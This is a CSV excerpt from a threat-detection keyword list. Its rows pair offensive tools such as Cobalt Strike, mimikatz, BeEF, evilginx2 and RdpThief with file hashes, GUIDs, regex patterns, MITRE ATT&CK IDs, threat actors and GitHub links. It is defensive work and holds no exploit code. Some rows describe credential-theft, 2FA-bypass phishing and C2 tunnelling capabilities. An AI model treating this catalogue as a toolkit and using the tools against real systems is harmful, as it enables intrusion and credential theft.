"*BeaconTool/lib/sleep.jar*",".{0,1000}BeaconTool\/lib\/sleep\.jar.{0,1000}","offensive_tool_keyword","cobaltstrike","Practice Go programming and implement CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/darkr4y/geacon","1","1","N/A","N/A","10","10","1189","206","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z","35732"
"*BeaconUseToken*",".{0,1000}BeaconUseToken.{0,1000}","offensive_tool_keyword","cobaltstrike","Dumping SAM / SECURITY / SYSTEM registry hives with a Beacon Object File","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/EncodeGroup/BOF-RegSave","1","1","N/A","N/A","10","10","198","32","2020-10-08T17:29:02Z","2020-10-07T13:46:03Z","35733"
"*bead5b0e022e634f9f775533f0e7df11aae0e6d1a1616ed7e1bef02abe38ca84*",".{0,1000}bead5b0e022e634f9f775533f0e7df11aae0e6d1a1616ed7e1bef02abe38ca84.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","35734"
"*beafc9e9d828c755348ee00e6afbcfa79072741353a8509881e13da012a27509*",".{0,1000}beafc9e9d828c755348ee00e6afbcfa79072741353a8509881e13da012a27509.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","35735"
"*Bearer c29tZWludmFsaWQ6Y29tYmluYXRpb24=*",".{0,1000}Bearer\sc29tZWludmFsaWQ6Y29tYmluYXRpb24\=.{0,1000}","offensive_tool_keyword","reverst","Reverse Tunnels in Go over HTTP/3 and QUIC","T1572 - T1071.001 - T1105","TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/flipt-io/reverst","1","0","N/A","N/A","10","10","953","39","2025-04-16T22:33:32Z","2024-04-03T13:32:11Z","35736"
"*Beau Bullock (@dafthack)*",".{0,1000}Beau\sBullock\s\(\@dafthack\).{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","0","#content","N/A","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","35737"
"*beb128325351c7c87a1928ec9cb98e595f39b3da1a105bf229b04548644a3957*",".{0,1000}beb128325351c7c87a1928ec9cb98e595f39b3da1a105bf229b04548644a3957.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","#filehash","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","35738"
"*beb285e40caf95bcc1552fc293194fa29275e3cdb9c62ef752b62257f6480aaf*",".{0,1000}beb285e40caf95bcc1552fc293194fa29275e3cdb9c62ef752b62257f6480aaf.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","#filehash","N/A","8","5","440","61","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z","35739"
"*beb3dbf652aedb556fee96e7add11e5aa76be4028107fd1cf80066fe3479f43a*",".{0,1000}beb3dbf652aedb556fee96e7add11e5aa76be4028107fd1cf80066fe3479f43a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","35740"
"*BEB67A6E-4C54-4DE5-8C6B-2C12F44A7B92*",".{0,1000}BEB67A6E\-4C54\-4DE5\-8C6B\-2C12F44A7B92.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","#GUIDproject","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","35741"
"*beb8955b03b3bc379ad4fb6df1d54b1b5c0aa7226a0f2036a9cfe9a4eac5b488*",".{0,1000}beb8955b03b3bc379ad4fb6df1d54b1b5c0aa7226a0f2036a9cfe9a4eac5b488.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","35742"
"*beb982a616c2c4cd716387b6a4c7a4b86ddcca0bc76faa94b4c5f10ed7abd592*",".{0,1000}beb982a616c2c4cd716387b6a4c7a4b86ddcca0bc76faa94b4c5f10ed7abd592.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","35743"
"*beb9a98df0d88653ba149728d157a519df367a2015fd2d120daeef988027ba6f*",".{0,1000}beb9a98df0d88653ba149728d157a519df367a2015fd2d120daeef988027ba6f.{0,1000}","offensive_tool_keyword","SomalifuscatorV2","windows batch obfuscator","T1027 - T1497 - T1057","TA0005","N/A","N/A","Defense Evasion","https://github.com/KDot227/SomalifuscatorV2","1","0","#filehash","N/A","10","4","315","42","2025-01-19T04:30:49Z","2022-09-23T00:46:51Z","35744"
"*BEBE6A01-0C03-4A7C-8FE9-9285F01C0B03*",".{0,1000}BEBE6A01\-0C03\-4A7C\-8FE9\-9285F01C0B03.{0,1000}","offensive_tool_keyword","RdpThief","Extracting Clear Text Passwords from mstsc.exe using API Hooking.","T1056.004 - T1110 - T1563.002","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/0x09AL/RdpThief","1","0","#GUIDproject","N/A","10","10","1311","361","2024-07-20T06:58:02Z","2019-11-03T17:54:38Z","35745"
"*BEBE6A01-0C03-4A7C-8FE9-9285F01C0B03*",".{0,1000}BEBE6A01\-0C03\-4A7C\-8FE9\-9285F01C0B03.{0,1000}","offensive_tool_keyword","RdpThief","Extracting Clear Text Passwords from mstsc.exe using API Hooking.","T1056.004 - T1110 - T1563.002","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/0x09AL/RdpThief","1","0","#GUIDproject","N/A","10","10","1311","361","2024-07-20T06:58:02Z","2019-11-03T17:54:38Z","35746"
"*bec183f1fa76d90ec29cd04ceaf23d80098d71df52ecc378b34260e036b958c7*",".{0,1000}bec183f1fa76d90ec29cd04ceaf23d80098d71df52ecc378b34260e036b958c7.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#filehash","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","35747"
"*bec1bf8b5dc63cdda1a346684b1ebdae02cb2f34d18ef589debc018d6bc04253*",".{0,1000}bec1bf8b5dc63cdda1a346684b1ebdae02cb2f34d18ef589debc018d6bc04253.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","35748"
"*bec3552674f4aa1fe8bdeb2776005fb3098de9a86c22d81021a09f1ede608a5c*",".{0,1000}bec3552674f4aa1fe8bdeb2776005fb3098de9a86c22d81021a09f1ede608a5c.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","35749"
"*becb807e8d5a4508b1ea3e4e8ab5af60fd5dcfc4e938a58c1694cc968aab521a*",".{0,1000}becb807e8d5a4508b1ea3e4e8ab5af60fd5dcfc4e938a58c1694cc968aab521a.{0,1000}","offensive_tool_keyword","NetRipper","NetRipper - Smart traffic sniffing for penetration testers","T1173 - T1557 - T1573.001 - T1056.001","TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/NytroRST/NetRipper","1","0","#filehash","N/A","10","10","1368","318","2022-06-17T21:08:54Z","2015-07-14T20:31:04Z","35750"
"*bed163d2dafa8fc4074ece57cdb10edaf275ddf5599375b9d58e025bd0cf42ef*",".{0,1000}bed163d2dafa8fc4074ece57cdb10edaf275ddf5599375b9d58e025bd0cf42ef.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","35751"
"*bed39aa210495c7abbcea21448c62a2ac5a90eaa4d6d3d315f2a09273279af90*",".{0,1000}bed39aa210495c7abbcea21448c62a2ac5a90eaa4d6d3d315f2a09273279af90.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","35752"
"*bee12d2a87cfe2fccb8e9c81b1f3202c4101568d71b5434a04e59f6768730af2*",".{0,1000}bee12d2a87cfe2fccb8e9c81b1f3202c4101568d71b5434a04e59f6768730af2.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","35754"
"*bee31d03a675de4ba18634b913bb303edbb8854357dcac687facbcf2afb42804*",".{0,1000}bee31d03a675de4ba18634b913bb303edbb8854357dcac687facbcf2afb42804.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","35755"
"*bee3d0ac0967389571ea8e3a8c0502306b3dbf009e8155f00a2829417ac079fc*",".{0,1000}bee3d0ac0967389571ea8e3a8c0502306b3dbf009e8155f00a2829417ac079fc.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","35758"
"*bee3d0ac0967389571ea8e3a8c0502306b3dbf009e8155f00a2829417ac079fc*",".{0,1000}bee3d0ac0967389571ea8e3a8c0502306b3dbf009e8155f00a2829417ac079fc.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","35759"
"*bee3d0ac0967389571ea8e3a8c0502306b3dbf009e8155f00a2829417ac079fc*",".{0,1000}bee3d0ac0967389571ea8e3a8c0502306b3dbf009e8155f00a2829417ac079fc.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","35760"
"*bee3d0ac0967389571ea8e3a8c0502306b3dbf009e8155f00a2829417ac079fc*",".{0,1000}bee3d0ac0967389571ea8e3a8c0502306b3dbf009e8155f00a2829417ac079fc.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","35761"
"*bee821a0267335398f5db2ced5c2e2687ced844c8a1627d111d4fd0692b791e6*",".{0,1000}bee821a0267335398f5db2ced5c2e2687ced844c8a1627d111d4fd0692b791e6.{0,1000}","offensive_tool_keyword","mRemoteNG-Decrypt","Python script to decrypt passwords stored by mRemoteNG","T1555.003 - T1110.003 - T1003 - T1081","TA0006 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/kmahyyg/mremoteng-decrypt","1","0","#filehash","N/A","8","1","83","21","2022-10-29T16:02:26Z","2019-05-11T09:09:49Z","35762"
"*BEE88186-769A-452C-9DD9-D0E0815D92BF*",".{0,1000}BEE88186\-769A\-452C\-9DD9\-D0E0815D92BF.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","#GUIDproject","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","35763"
"*beec549317fffcc123e613d5f931f5c4441e7b77ef09a21582a795d3fee816f5*",".{0,1000}beec549317fffcc123e613d5f931f5c4441e7b77ef09a21582a795d3fee816f5.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","35764"
"*beef:beef*",".{0,1000}beef\:beef.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","0","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","35765"
"*beef_bind_tcp-stage.asm*",".{0,1000}beef_bind_tcp\-stage\.asm.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","35766"
"*beef_bind_tcp-stager.asm*",".{0,1000}beef_bind_tcp\-stager\.asm.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","35767"
"*beef_bind-stage*.rb*",".{0,1000}beef_bind\-stage.{0,1000}\.rb.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","35768"
"*beef_bind-stage.asm*",".{0,1000}beef_bind\-stage\.asm.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","35769"
"*beef_bind-stager.asm*",".{0,1000}beef_bind\-stager\.asm.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","35770"
"*beef_test.rb*",".{0,1000}beef_test\.rb.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","0","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","35771"
"*beefproject*",".{0,1000}beefproject.{0,1000}","offensive_tool_keyword","beef","The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1210 - T1216 - T1207 - T1189 - T1190 - T1566","TA0001 - TA0002 - TA0003 - TA0006","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","35772"
"*beef-xss*",".{0,1000}beef\-xss.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","35773"
"*Beelogger*",".{0,1000}Beelogger.{0,1000}","offensive_tool_keyword","BeeLogger","Keylogger generator. fake office and acrobat file and malicious executables generator","T1056 - T1105 - T1204 - T1106","TA0003 - TA0004 - TA0007","N/A","N/A","Exploitation tool","https://github.com/4w4k3/BeeLogger","1","1","N/A","N/A","N/A","10","1054","332","2022-12-02T19:42:41Z","2017-02-17T15:34:39Z","35774"
"*BeetleChunks/SpoolSploit*",".{0,1000}BeetleChunks\/SpoolSploit.{0,1000}","offensive_tool_keyword","spoolsploit","A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.","T1204 - T1547 - T1562 - T1003 - T1018 - T1570 - T1005","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","Black Basta","Exploitation tool","https://github.com/BeetleChunks/SpoolSploit","1","1","N/A","N/A","N/A","6","555","90","2021-07-16T04:49:43Z","2021-07-07T00:32:28Z","35775"
"*bef1d97b5fa30aea0ddffcc7275d34f13c54bf8b812326a37e958a314968d3af*",".{0,1000}bef1d97b5fa30aea0ddffcc7275d34f13c54bf8b812326a37e958a314968d3af.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","#filehash","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","35776"
